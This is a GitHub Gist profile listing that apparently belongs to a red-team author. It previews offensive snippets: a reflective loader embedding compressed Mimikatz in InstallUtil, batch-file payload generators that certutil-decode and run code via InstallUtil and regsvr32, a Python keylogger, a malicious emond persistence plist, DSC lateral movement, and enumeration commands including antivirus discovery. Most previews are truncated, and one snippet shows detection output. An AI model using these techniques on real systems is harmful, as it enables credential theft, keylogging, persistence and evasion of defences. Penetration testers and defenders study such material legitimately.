Skip to content

Instantly share code, notes, and snippets.


Chris Ross xorrior

View GitHub Profile
xorrior / PELoader.cs
Created Jul 12, 2017
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
View PELoader.cs
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
xorrior / wmic_cmds.txt
Last active Jan 20, 2021
Useful Wmic queries for host and domain enumeration
View wmic_cmds.txt
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
View PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
xorrior /
Created Dec 11, 2017
Python on disk keylogger
import zipfile
import io
import sys
import os, imp
import base64
import threading
moduleRepo = {}
_meta_cache = {}
xorrior / emond-examples.txt
Last active Jun 1, 2020
fswatch and osquery command syntax w/ output
View emond-examples.txt
Fswatch command
fswatch -r --format="'{\"path\": \"%p\", \"timestamp\":\"%t\", \"flag\": \"%f\"}'" /etc/emond.d/rules/
Output when event is triggered
'{"path": "/private/etc/emond.d/rules/test.plist", "timestamp":"Tue Jan 16 21:17:24 2018", "flag": "PlatformSpecific IsFile"}'
osquery.results.log output from event.
{"name":"file_events","hostIdentifier":"host","calendarTime":"Thu Jan 11 07:00:10 2018 UTC","unixTime":"1515654010","epoch":"0","counter":"0","columns":{"action":"CREATED","atime":"1515653980","category":"emond","ctime":"1515653980","gid":"0","hashed":"1","inode":"1316814","md5":"b1f38ed6d9dca2d33ce733d51617e900","mode":"0644","mtime":"1515653980","sha1":"003a4a25662147ca19692dd01d2d7e06ea751c5e","sha256":"f26ee0eab108d3794426f609ccd878d7a7057e2fab3bea215152e4f35c82b0cf","size":"986","target_path":"\/private\/etc\/emond.d\/rules\/test.plist","time":"1515653983","transaction_id":"2101010","uid":"0"},"action":"added"}
xorrior / bad.plist
Last active Jan 21, 2020
Example Malicious emond plist
View bad.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<string>empire rules</string>
xorrior / New-InstallUtilBatchFile.ps1
Created Oct 27, 2016
Generate InstallUtil payload within batch file for delivery
View New-InstallUtilBatchFile.ps1
function New-InstallUtilBatchFile
#You must provide an encoded payload using certutil -encode for the InFilePath.
#certutil -encode payload.exe payload.txt
#For compiling w/ a managed powershell runner
# C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\\System.Management.Automation.dll" /out:payload.exe payload.cs
xorrior / messagebox.m
Last active Jul 25, 2019
Installer Plugin that pops a message box to the user
View messagebox.m
// MyInstallerPane.m
// messagebox
// Created by Chris Ross on 1/23/18.
// Copyright © 2018 testplugin. All rights reserved.
This should be in MyInstallerPane.h
xorrior / New-RegSvr32BatchFile.ps1
Created Oct 28, 2016
Generate a batch file to execute a dll with regsvr32
View New-RegSvr32BatchFile.ps1
function New-RegSvr32BatchFile
Generates a batch file which will contain a certutil encoded, cab compressed payload.
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
xorrior / PowerView-3.0-tricks.ps1
Created Jul 5, 2018 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set